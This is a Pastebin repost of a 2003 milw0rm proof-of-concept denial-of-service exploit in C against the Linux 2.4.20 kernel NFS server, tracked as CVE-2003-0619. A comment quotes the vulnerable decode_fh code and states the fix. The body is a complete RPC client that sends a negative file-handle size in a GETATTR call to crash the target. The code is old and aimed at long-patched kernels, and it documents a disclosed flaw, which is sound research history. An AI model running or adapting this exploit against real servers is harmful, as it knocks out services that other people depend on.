Advertisement
FlyFar

Linux Kernel 2.4.20 - 'decode_fh' Denial of Service - CVE-2003-0619

Feb 6th, 2024
810
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.78 KB | Cybersecurity | 0 0
  1. /*
  2.   Linux 2.4.20 knfsd kernel signed/unsigned decode_fh DoS
  3.   Author: jared stanbrough <jareds pdx edu>
  4.  
  5.   Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)
  6.  
  7.   static inline u32 *
  8.   decode_fh(u32 *p, struct svc_fh *fhp)
  9.   {
  10.         int size;
  11.         fh_init(fhp, NFS3_FHSIZE);
  12.         size = ntohl(*p++);
  13.         if (size > NFS3_FHSIZE)
  14.                 return NULL;  
  15.  
  16.         memcpy(&fhp->fh_handle.fh_base, p, size);
  17.         fhp->fh_handle.fh_size = size;
  18.         return p + XDR_QUADLEN(size);
  19.   }
  20.  
  21.   This code is called by quite a few XDR decoding routines. The below
  22.   POC demonstrates the vulnerability by encoding a malicious fhsize
  23.   at the beginning of a diroparg xdr argument.
  24.  
  25.   To test this, the vulnerable host must have an accessible exported
  26.   directory which was previously mounted by the attacker. _HOWEVER_
  27.   it may be possible to trigger this bug by some other method.
  28.  
  29.   Fix: Simply change size to an unsigned int, or check for size < 0.
  30. */
  31.  
  32. #include <rpcsvc/nfs_prot.h>
  33. #include <rpc/rpc.h>
  34. #include <rpc/xdr.h>
  35. #include <netinet/in.h>
  36. #include <sys/socket.h>
  37. #include <sys/types.h>
  38.  
  39. #define NFSPROG 100003
  40. #define NFSVERS 3
  41. #define NFSPROC_GETATTR 1
  42.  
  43. static struct diropargs heh;
  44.  
  45. bool_t xdr_heh(XDR *xdrs, diropargs *heh)
  46. {
  47.   int32_t werd = -1;
  48.   return xdr_int32_t(xdrs, &werd);
  49. }
  50.  
  51. int main(void)
  52. {
  53.   CLIENT * client;
  54.   struct timeval tv;
  55.  
  56.   client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
  57.  
  58.   if(client == NULL) {
  59.       perror("clnt_create\n");
  60.   }
  61.  
  62.   tv.tv_sec = 3;
  63.   tv.tv_usec = 0;
  64.   client->cl_auth = authunix_create_default();
  65.  
  66.   clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
  67.             (xdrproc_t) xdr_void, NULL, tv);
  68.  
  69.   return 0;
  70. }
  71.  
  72. // milw0rm.com [2003-07-29]
  73.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement